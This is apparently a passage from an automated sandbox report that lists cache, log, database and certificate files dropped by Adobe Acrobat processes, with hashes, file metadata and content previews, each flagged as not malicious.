                                                                                          Preview:2024/12/19-06:48:27.632 548 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:48:27.643 548 Recovering log #3.2024/12/19-06:48:27.644 548 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\5d87824a-c5d8-4524-914d-6e2c3dba365c.tmp

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:JSON data
                                                                                          Category:modified
                                                                                          Size (bytes):475
                                                                                          Entropy (8bit):4.959716522192626
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:YH/um3RA8sq+iEsBdOg2H9qcaq3QYiubSpDyP7E4TX:Y2sRdsMdMHj3QYhbSpDa7n7
                                                                                          MD5:34873D997EE9622190D0E14911FDB470
                                                                                          SHA1:21C4A7DB6C54D676C8A6A3674410E441575ABB6A
                                                                                          SHA-256:63AC24AF283639F1E3DA757DC7545F794BCBB1254C9B63FA929336D270C59C2E
                                                                                          SHA-512:76435A4CCABC06CAE9EEDB220EAEBA14659A9E8125ECBFDE1EEAAB4906D293C258BF665C5648B532C6491E33BF927CA5A68C685D46C650E48AA7D77A9AA7226C
                                                                                          Malicious:false
                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379168919724318","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":639828},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):475
                                                                                          Entropy (8bit):4.959716522192626
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:YH/um3RA8sq+iEsBdOg2H9qcaq3QYiubSpDyP7E4TX:Y2sRdsMdMHj3QYhbSpDa7n7
                                                                                          MD5:34873D997EE9622190D0E14911FDB470
                                                                                          SHA1:21C4A7DB6C54D676C8A6A3674410E441575ABB6A
                                                                                          SHA-256:63AC24AF283639F1E3DA757DC7545F794BCBB1254C9B63FA929336D270C59C2E
                                                                                          SHA-512:76435A4CCABC06CAE9EEDB220EAEBA14659A9E8125ECBFDE1EEAAB4906D293C258BF665C5648B532C6491E33BF927CA5A68C685D46C650E48AA7D77A9AA7226C
                                                                                          Malicious:false
                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379168919724318","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":639828},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):4099
                                                                                          Entropy (8bit):5.235348769409317
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtPfttfldYg:CwNw1GHqPySfkcigoO3h28ytPffldp
                                                                                          MD5:B1EEB9E43F4D1BA9CBAA7D501084D842
                                                                                          SHA1:E980A86F78B5FF197F3311534A5FD60D02E8835D
                                                                                          SHA-256:AFC5D559979308B37881D07E0E8596F037EC81420632B2F6E671065E0CA07C91
                                                                                          SHA-512:1E27A0F85CF8AF941D07BDDB98C6A2804BE3D4A0D8EC76D2DC639E7010FE7F4F200FD004B4B79B8BCAAEBE75B07997B399568A4B5698FB5C5ACF9177C53B0939
                                                                                          Malicious:false
                                                                                          Preview:*...#................version.1..namespace-.aw.o................next-map-id.1.Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.0I.$.r................next-map-id.2.Snamespace-9a9aa6d6_c307_4dda_b6c0_dc91084c8e68-https://rna-v2-resource.acrobat.com/.1!...r................next-map-id.3.Snamespace-1fbd9dc5_70a3_4975_91b4_966e0915c27a-https://rna-v2-resource.acrobat.com/.2..N.o................next-map-id.4.Pnamespace-0e0aed8d_6d6f_4be0_b28f_8e02158bc792-https://rna-resource.acrobat.com/.3*.z.o................next-map-id.5.Pnamespace-52652c26_09c2_43f2_adf7_da56a1f00d32-https://rna-resource.acrobat.com/.4.{.^...............Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.C..r................next-map-id.6.Snamespace-3a89c6b0_72b9_411a_9e44_fa247f34ac91-https://rna-v2-resource.acrobat.com/.5.q._r................next-map-id.7.Snamespace-02b23955_9103_42e0_ba64_3f8683969652-https://rna-v2-resource.acrobat.com/.6..d.o..............

                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):329
                                                                                          Entropy (8bit):5.283207927324686
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:7Dx3+q2PcNwi2nKuAl9OmbzNMxIFUt8OD3Zmw+ODXVkwOcNwi2nKuAl9OmbzNMFd:7DsvLZHAa8jFUt8OD3/+ODl54ZHAa84J
                                                                                          MD5:C7FDEFBA326B210E9985D5399B253BB7
                                                                                          SHA1:604A8D1118942CA67E2DB4D8421B1FEA5D415E95
                                                                                          SHA-256:04BC2333A5E7D8F3841D477D03EC7DC5938CFB883734B9AAC70B5057D0946055
                                                                                          SHA-512:7EA3217EEBBD49C3516704942BAB6797902EFAF214CE257D78C53FDFB6EF132B5C5390A19D94011F249B796CB2CF0BB8DCDBB386B869BAF6CCCEBECECDAB3BB8
                                                                                          Malicious:false
                                                                                          Preview:2024/12/19-06:48:27.813 548 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:48:27.815 548 Recovering log #3.2024/12/19-06:48:27.815 548 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):329
                                                                                          Entropy (8bit):5.283207927324686
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:7Dx3+q2PcNwi2nKuAl9OmbzNMxIFUt8OD3Zmw+ODXVkwOcNwi2nKuAl9OmbzNMFd:7DsvLZHAa8jFUt8OD3/+ODl54ZHAa84J
                                                                                          MD5:C7FDEFBA326B210E9985D5399B253BB7
                                                                                          SHA1:604A8D1118942CA67E2DB4D8421B1FEA5D415E95
                                                                                          SHA-256:04BC2333A5E7D8F3841D477D03EC7DC5938CFB883734B9AAC70B5057D0946055
                                                                                          SHA-512:7EA3217EEBBD49C3516704942BAB6797902EFAF214CE257D78C53FDFB6EF132B5C5390A19D94011F249B796CB2CF0BB8DCDBB386B869BAF6CCCEBECECDAB3BB8
                                                                                          Malicious:false
                                                                                          Preview:2024/12/19-06:48:27.813 548 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:48:27.815 548 Recovering log #3.2024/12/19-06:48:27.815 548 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                          C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241219114832Z-205.bmp

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                          Category:dropped
                                                                                          Size (bytes):65110
                                                                                          Entropy (8bit):0.6376462682686903
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:Fn1AGmY2nTLKnzN4lu1/4uy47rHMMMxAz:FsY2XQzyQnuc
                                                                                          MD5:1468EB269F45D6EECE72317AF6B1587F
                                                                                          SHA1:AB52469CD54F341F71D8EEA78E5293C597CC2560
                                                                                          SHA-256:56B0D18154217AEBE5F78DAA5DAF7861967BB4B615B7D1FFCDBC3C98C8834393
                                                                                          SHA-512:FFEF2EC31529E6165D9549A150FC8DA65917002B81A8E4747853AC7F51D88B3AC545862D5EB39684064EE600140C9D0BDAA97D14067C01AA24B17419950781FA
                                                                                          Malicious:false
                                                                                          Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                                          Category:dropped
                                                                                          Size (bytes):86016
                                                                                          Entropy (8bit):4.439148814605528
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:yeaci5GEiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:1IurVgazUpUTTGt
                                                                                          MD5:7F84EB44602256F376F2FAC70758A24A
                                                                                          SHA1:5740CDAE35F767B3E730A021EAF977CA8A057D09
                                                                                          SHA-256:4676998A230CD4FF21E6768E38C6CBD759EC6D4F8716D0171F12C6EF89DCCB6C
                                                                                          SHA-512:51D310ADAD2D7861FBF7ACAB8DC4198F3A896EE7736515D33F9F076019181A317DC94E36F277928EF5652A461AA282ABC7BBA27FB2A3253B76F57A9C8BFBCD42
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:SQLite Rollback Journal
                                                                                          Category:dropped
                                                                                          Size (bytes):8720
                                                                                          Entropy (8bit):3.778369027307157
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:7MLp/E2ioyV1Rioy3DoWoy1CABoy1iaKOioy1noy1AYoy1Wioy1hioybioysOoyZ:7Ipju1R0iAmSXKQJMvb9IVXEBodRBk1
                                                                                          MD5:655E20125EA8B99AB5C974DC2840AF33
                                                                                          SHA1:E39C908CDBB69F7A25FF39B24AD3BA15CCC89C0A
                                                                                          SHA-256:22653ABAA3B172135F1FDF7E5B22315E6B654D67119F63BDDC51166381A96752
                                                                                          SHA-512:3B2EE99D33F81738113D11A36756C0FB71061F61F0E538782658002811C716F71D8CC82498842668EEBD57F1A50249C1FF005EF9C80931EF3395B782E88FD88D
                                                                                          Malicious:false
                                                                                          Preview:.... .c.....>.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:Certificate, Version=3
                                                                                          Category:dropped
                                                                                          Size (bytes):1391
                                                                                          Entropy (8bit):7.705940075877404
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                          MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                          SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                          SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                          SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                          Malicious:false
                                                                                          Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                          Category:dropped
                                                                                          Size (bytes):71954
                                                                                          Entropy (8bit):7.996617769952133
                                                                                          Encrypted:true
                                                                                          SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                          MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                          SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                          SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                          SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                          Malicious:false
                                                                                          Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):192
                                                                                          Entropy (8bit):2.746484906506307
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:kkFklnQ4+k31fllXlE/HT8kpGlrtNNX8RolJuRdxLlGB9lQRYwpDdt:kKH4bmT8gy3NMa8RdWBwRd
                                                                                          MD5:D248FC71690999A67AD27323F9CA02A9
                                                                                          SHA1:C6C205ED560AF1DCDBBF709BE48746DFD96269F1
                                                                                          SHA-256:4AA11F5340E8638514580C661177C62B4045A8ACFABB0685BB76650E9582ABEB
                                                                                          SHA-512:F083AE317E67280F28DE2F85830DE8825379A672EC57EABE7F30FE608DCD5FD28A0B3F17B7162AB7EE096E4E9AA5DEA3605CB6CCCF4971AD9FA89F5AB2737016
                                                                                          Malicious:false
                                                                                          Preview:p...... ..........h..R..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:data
                                                                                          Category:modified
                                                                                          Size (bytes):328
                                                                                          Entropy (8bit):3.1501841598665044
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:kKSLD9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:rDnLNkPlE99SNxAhUe/3
                                                                                          MD5:0CB964713C05DA622DA4DFA697B33048
                                                                                          SHA1:8F47C4350F16BCF16A79B8EC0A2F47F5D0C32685
                                                                                          SHA-256:A4A6677BF1D00821219FD5790EE96612B26F0FF8D26E583D8A1A989189EB02EF
                                                                                          SHA-512:FD1CDADF6455272037B8F33A347A97D844582468F2297B4ED5B56E7E059DB580FE902686CC019CC11AED78B1AA7F3223DF201484F13F43332853428029FAA8ED
                                                                                          Malicious:false
                                                                                          Preview:p...... .........g`..R..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):295
                                                                                          Entropy (8bit):5.380474895171467
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJM3g98kUwPeUkwRe9:YvXKXqrsLKRsdTeOAGMbLUkee9
                                                                                          MD5:A04311E4F7503E13BC7D0699A8DC0AD9
                                                                                          SHA1:79BA255FE990C6E26AC8F5C51A54B11838BD239A
                                                                                          SHA-256:17791CCC0A680CDC899BB2EAFA5BBD49F4EB3CC71D5D1F1A171F61D0114D40EE
                                                                                          SHA-512:C85F96EF3620896AA5E9D7BEFCF17513ED3627709BDF0FA9D3874FC3FBCACF34309DF7A29081204AB00516DD790F893F5F92234E38B590B847B88ED3BD2743B5
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):294
                                                                                          Entropy (8bit):5.318721355951607
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJfBoTfXpnrPeUkwRe9:YvXKXqrsLKRsdTeOAGWTfXcUkee9
                                                                                          MD5:39F1C8EDD62A6FA63BB5940582E35A00
                                                                                          SHA1:13D547C7ECB8FB1290B95CFDA22017A9D1FBD74D
                                                                                          SHA-256:04BAB6CE67C198FBF2269AACE54869F118645738D619FA42197B1286C1646F35
                                                                                          SHA-512:1D6217403F39AFD22DAC84BEE83B706848B48323DEB2852215CABF8D13952085B272D85C925F33688AAEEA386E78166A89CA1FE6346CFF76C8EA8EC7C184C920
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):294
                                                                                          Entropy (8bit):5.2982079250890095
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJfBD2G6UpnrPeUkwRe9:YvXKXqrsLKRsdTeOAGR22cUkee9
                                                                                          MD5:014B211EE5ABFF835264B0799D639007
                                                                                          SHA1:843C498EEF6E3E369CF4F1E4828664E4E48C8935
                                                                                          SHA-256:DE3A081B4CC58C9C181DC78D18661EADA051A836239413A4CE0093F09485995A
                                                                                          SHA-512:391A51E726488CA8973983A3F8E9C4BFBF86B6100CE2406DF775216B0CEA3AF1C545F4D78C26897D40ED0BB98A2086A6EBABEBF20449159590BBA46C10B59334
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):285
                                                                                          Entropy (8bit):5.3679536021457315
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJfPmwrPeUkwRe9:YvXKXqrsLKRsdTeOAGH56Ukee9
                                                                                          MD5:C87AF7C2CC97AB48B46E21844E33FD26
                                                                                          SHA1:8E991DF2ED98A97AA8C970A6BFE04964B1C31BCF
                                                                                          SHA-256:343394B9F17D275EF1520302520FB2572FFDA38583CA9826D7D5209AD159CB53
                                                                                          SHA-512:201A3605E82D9D3DE2689B55F2CE62C3C2E79F1F93E9FB5E712206963C84F25766F410730BD818315C64B42B33614CCBBC83691E80CEA4A927A7A0539B50F099
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):1123
                                                                                          Entropy (8bit):5.687129763083913
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:Yv6XSs6meOdpLgE9cQx8LennAvzBvkn0RCmK8czOCCS3:YvtsJemhgy6SAFv5Ah8cv/3
                                                                                          MD5:F78F067E4B62297867D6C42F4241D4F9
                                                                                          SHA1:FAABDC3175004E751FF3E6B27289054D0EC01558
                                                                                          SHA-256:CD87B12E1A60142EFAD00B46CFAD8561331F7797B0B5504BB4A5F3444698AE96
                                                                                          SHA-512:B34A2C18023C7A5027F80AC8B075FF930CB659EDA4D065E9B1944356435E7B081B99C1B68004B8537ACE3DC7987116FD746434F7926B030B52CE3A44A77F6054
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):289
                                                                                          Entropy (8bit):5.303325740156883
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJf8dPeUkwRe9:YvXKXqrsLKRsdTeOAGU8Ukee9
                                                                                          MD5:E9FC1F400710CC67F0074EFF447A3EFD
                                                                                          SHA1:7FCB64CB9732B8D693B0256F15C174D14DAE3578
                                                                                          SHA-256:3EB36C37CE0192EAE4FE536FF62B60ECED23D000A30A6A9F21866E5D003FACE2
                                                                                          SHA-512:BF66C537245265DD9109684B4980C7FCADEDAFFFAEA67C85D7E2461B584AED3F4FBCE637534504672622CA1FF474B81175EBF3E621E1937CD9E20C843C2186D8
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
